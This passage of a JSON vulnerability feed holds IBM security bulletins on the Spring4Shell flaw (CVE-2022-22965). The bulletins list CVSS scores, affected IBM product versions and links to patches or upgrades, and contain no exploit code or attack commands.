spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nInfoSphere Information Server, \nInformation Server on Cloud| 11.7 \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRMF**| **APAR**| **Remediation** \n---|---|---|--- \nInfoSphere Information Server, InfoSphere Information Server on Cloud| 11.7| [JR64760](<http://www.ibm.com/support/docview.wss?uid=swg1JR64760> \"JR64760\" )| \\--Apply IBM InfoSphere Information Server version [11.7.1.0](<https://www.ibm.com/support/pages/node/878310>) \n\\--Apply IBM InfoSphere Information Server version [11.7.1.3](<https://www.ibm.com/support/pages/node/6498109> \"11.7.1.3\" ) \n\\--Apply Information Server [11.7.1.3 Service pack 4](<https://www.ibm.com/support/pages/node/6568469> \"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T23:09:44", "type": "ibm", "title": "Security Bulletin: IBM InfoSphere Information Server is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T23:09:44", "id": "55BD84BAE8C7A14BA43B1D5F808B6528E4FBEF810015A85F798847837C477C2F", "href": "https://www.ibm.com/support/pages/node/6575577", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:36", "description": "## Summary\n\nHMC is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Cloud connector service if enabled will use only the spring, as in a client to make only the REST calls with IBM Cloud Mangement Console. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nHMC V10.1.1010.0| V10.1.1010.0 and later \nHMC V9.2.950.0| V9.2.950.0 and later \n \n\n\n## Remediation/Fixes\n\nThe following fixes are available on IBM Fix Central at: <http://www-933.ibm.com/support/fixcentral/>\n\nProduct\n\n| \n\nVRMF\n\n| \n\nAPAR\n\n| \n\nRemediation/Fix \n \n---|---|---|--- \n \nPower HMC\n\n| \n\nV9.2.952.0 ppc\n\n| \n\nMB04331\n\n| \n\n[MH01925](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~9100HMCppc&release=V9R2&platform=All> \"MH01913\" ) \n \nPower HMC\n\n| \n\nV9.2.952.0 x86\n\n| \n\nMB04330\n\n| \n\n[MH01924](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~9100HMC&release=V9R2&platform=All> \"MH01912\" ) \n \nPower HMC\n\n| \n\nV10.1.1010.0 ppc\n\n| \n\nMB04335\n\n| \n\n[MF69724](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~9100HMCppc&release=V10R1&platform=All> \"\" ) \n \nPower HMC\n\n| \n\nV10.1.1010.0 x86\n\n| \n\nMB04334\n\n| \n\n[MF69722](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~vHMC&release=V10R1&platform=All> \"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T07:22:34", "type": "ibm", "title": "Security Bulletin: HMC is affected but not classified as vulnerable by a remote code execution in Spring Framework 
(CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-01T07:22:34", "id": "3AAC421D0DF5831B3220FCCBA6EA78CC01A191BC68D1B4BF16F97C53C8358B64", "href": "https://www.ibm.com/support/pages/node/6591147", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:36", "description": "## Summary\n\nWatson Machine Learning Accelerator is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. WMLA uses the Spring Framework to manage the Java application's dependency injection, events, resources, i18n, validation, data binding, type conversion, SpEL, AOP. The fix includes Spring 5.3.19.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Machine Learning Accelerator| \n\n2.2.0;2.2.1;2.2.2;2.2.3 \n2.3.0;2.3.1;2.3.2;2.3.3;2.3.4;2.3.5;2.3.6;2.3.7;2.3.8 \n1.2.1;1.2.2;1.2.3 \n \n \n\n\n## Remediation/Fixes\n\n**1\\. For Watson Machine Learning Accelerator version 2.2.x**\n\nTo address the affected version, upgrade to IBM Watson Machine Learning Accelerator 2.2.4 by following the document <https://www.ibm.com/docs/en/cloud-paks/cp-data/3.5.0?topic=accelerator-upgrading-watson-machine-learning>\n\n**2\\. For Watson Machine Learning Accelerator version 2.3.x**\n\nTo address the affected version, upgrade to IBM Watson Machine Learning Accelerator 2.3.9 by following the document <https://www.ibm.com/docs/en/wmla/2.3?topic=installation-install-upgrade>\n\n**3\\. 
For Watson Machine Learning Accelerator version 1.2.3**\n\nTo address the affected version, install the interim fix 601147 from the following location: <https://www.ibm.com/eserver/support/fixes/> with fix id: dli-1.2.3-build601147-wmla \n\nNote: For versions 1.2.1 and 1.2.2, first upgrade the cluster to version 1.2.3 by following the document <https://www.ibm.com/docs/ro/wmla/1.2.3?topic=upgrading-wml-accelerator>, then install the interim fix 601147.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T02:33:07", "type": "ibm", "title": "Security Bulletin: Watson Machine Learning Accelerator is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-01T02:33:07", "id": "E9F0B13DD28C1AFA3EA944A83A0281284C2444069758D5085ED5787CB960A8C5", "href": "https://www.ibm.com/support/pages/node/6591113", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:39", "description": 
"## Summary\n\nIBM Security SOAR is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Access to the Spring Framework is through internal, trusted APIs only. The fix includes Spring version 5.2.20.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n**DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM\u00ae Security SOAR | \n\nIBM Security SOAR versions 26 - 44.1 \n \n## Remediation/Fixes\n\nIBM encourages customers to promptly update their systems.\n\nUsers must upgrade to v44.2.0 or higher of IBM SOAR in order to obtain a fix for this vulnerability. 
You can upgrade the platform and apply the security updates by following the instructions in the \"**Upgrade Procedure**\" section in the [IBM Documentation](<https://www.ibm.com/docs/en/rsoa-and-rp/42?topic=guide-upgrading-platform> \"IBM Documentation\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T00:13:20", "type": "ibm", "title": "Security Bulletin: IBM Security SOAR is affected but not classified as vulnerable to remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-01T00:13:20", "id": "2F810DF5129E61B7AECC07F3698A4E88FEDD4A1E7CA3A999FA93E04C4733C72C", "href": "https://www.ibm.com/support/pages/node/6571299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:48", "description": "## Summary\n\nIBM Common Licensing is affected but not classified as vulnerable to a remote code execution in Spring Framework (220575, CVE-2022-22965) as it does not meet all of the following criteria: 1. 
JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. In IBM Common Licensing Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19 and is Spring- webmvc dependent. The fix includes Spring 5.3.19.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** IBM X-Force ID: **220575 \n** DESCRIPTION: **Spring Framework could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in the SerializableTypeWrapper class. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/220575 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220575>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Common Licensing| ART 8.1.6 \nIBM Common Licensing| ART 9.0 \nIBM Common Licensing| Agent 9.0 \n \n\n\n## Remediation/Fixes\n\nThe 220575,CVE-2022-22965 flaw lies in Spring Framework. Spring has provided update fixes (Spring Framework 5.2.20 & 5.3.18+). The advisory cautions that the vulnerability is \"general, and there may be other ways to exploit it.\" \nIBM strongly recommends addressing the Spring framework vulnerability now by applying the suggested fix that uses Spring Framework 5.3.19. \n\n \nApply the ART and Agent ifix from fix central :\n\n[IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Common+Licensing&fixids=IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1&source=SAR> \"IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-30T08:57:45", "type": "ibm", "title": "Security Bulletin:IBM Common Licensing is affected but not classified as vulnerable by a remote code execution in Spring Framework (220575,CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-30T08:57:45", "id": "81F73DF562970E5239B639CE59B471B9D34E39C4A5BDD496165656D76C34B09B", "href": "https://www.ibm.com/support/pages/node/6590823", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:35:02", "description": "## Abstract\n\nIs Sterling Order Management affected by Spring vulnerability CVE-2022-22965?\n\n## Content\n\nIBM is aware of a recently surfaced vulnerability [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) and has evaluated whether any Sterling Order Management applications are affected. The following is a summary of our evaluation:\n\nComponent | \n\nSpring \nversion\n\nused\n\n| Impacted by \nCVE-2022-22965 | \n\nImmediate\n\nMitigation\n\nPlan\n\n| Latest Status \n---|---|---|---|--- \nSterling Order Management SaaS, On-prem and Certified Containers (including Store Engagement & Call Center) | Not used | No | N/A | Not vulnerable \n \nInventory Visibility\n\nMicroservice \n\n| Not used | No | N/A | Not vulnerable \n \nIntelligent Promising\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOMS Data Exchange Service | Not used | No | N/A | Not vulnerable \n \nStore Inventory Management\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOrder Hub | Not used | No | N/A | Not vulnerable \nSterling Fulfillment Optimizer | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Omni-Configurator and Visual Modeler | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Field Sales | Not used | No | N/A | Not vulnerable \n \n## Related Information \n\n[Spring Framework RCE, Early 
Announcement - spring.io](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>)\n\n[CVE-2022-22965 - National Vulnerability Database](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>)\n\n[CVE-2022-22965 - mitre.org](<https://vulners.com/cve/CVE-2022-22965>)\n\n[CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+ - vmware.com](<https://tanzu.vmware.com/security/cve-2022-22965>)\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PEW\",\"label\":\"Sterling Order Management\"},\"ARM Category\":[{\"code\":\"a8m0z000000cy00AAA\",\"label\":\"Orders\"}],\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"All Versions\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-19T21:24:49", "type": "ibm", "title": "Security Bulletin: Sterling Order Management and Spring vulnerability CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": 
"2022-04-19T21:24:49", "id": "EF2166DB5EE8BD87E1440D3823C327B8BCA46A3FD349720520FD40C591911F30", "href": "https://www.ibm.com/support/pages/node/6572485", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:33:48", "description": "## Summary\n\nIBM API Connect V10 is vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it meets all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. This Spring vulnerability only exists, if clients installed the optional API Connect V10 Application Test and Monitor function. The fix includes Spring-boot 2.6.6, Spring-core 5.3.18 and Spring-framework 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAPI Connect| API Connect V10.0.0.0 - V10.0.1.1 \n---|--- \n| \n| \n \n\n\n## Remediation/Fixes\n\nAffected Product| Addressed in VRMF| APAR| Remediation/First Fix \n---|---|---|--- \n \nIBM API Connect \n\nV10.0.0.0-V10.0.1.1\n\n| 10.0.1.**<X>**| | Please see links to various resources for a quick ref. \n\n10.0.1.6-ifix1 \nRelease Announce notes: <https://www.ibm.com/support/pages/node/6571315> \nIBM Docs: <https://www.ibm.com/docs/en/api-connect/10.0.1.x?topic=aco-whats-new-in-latest-release-version-10016-ifix1-eus> \nFix Central: [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.1.6&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.1.6&platform=All&function=all>)\n\n10.0.4.0-ifix3 \nRelease Announce notes: <https://www.ibm.com/support/pages/node/6571313> \nIBM Docs: <https://www.ibm.com/docs/en/api-connect/10.0.x?topic=aco-whats-new-in-latest-release-version-10040-ifix3> \nFix Central: [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.4.0&platform=All&function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.4.0&platform=All&function=all>) (Filter fix details: 10.0.4.0-ifix3 ) \n \n| | | \n| | | \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T16:59:52", "type": "ibm", "title": "Security Bulletin: API Connect V10 is vulnerable to a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-05T16:59:52", "id": "F243281320AFD7E2710EDC7B3D2DE73901C6546A063CD6DB1074893EA50F7F8E", "href": "https://www.ibm.com/support/pages/node/6583065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:30:46", "description": "## Summary\n\nIBM Tivoli Netcool Impact is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965).Spring is shipped as part of ActiveMQ package but is not used by the product. The fix removes Spring from the product.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. 
\nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool Impact| 7.1.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading: \n\nProduct| VRMF| APAR| Remediation \n---|---|---|--- \nIBM Tivoli Netcool Impact 7.1.0| 7.1.0.26| IJ39753| Upgrade to [IBM Tivoli Netcool Impact 7.1.0 FP26](<https://www.ibm.com/support/pages/node/6587919> \"IBM Tivoli Netcool Impact 7.1.0 FP26\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 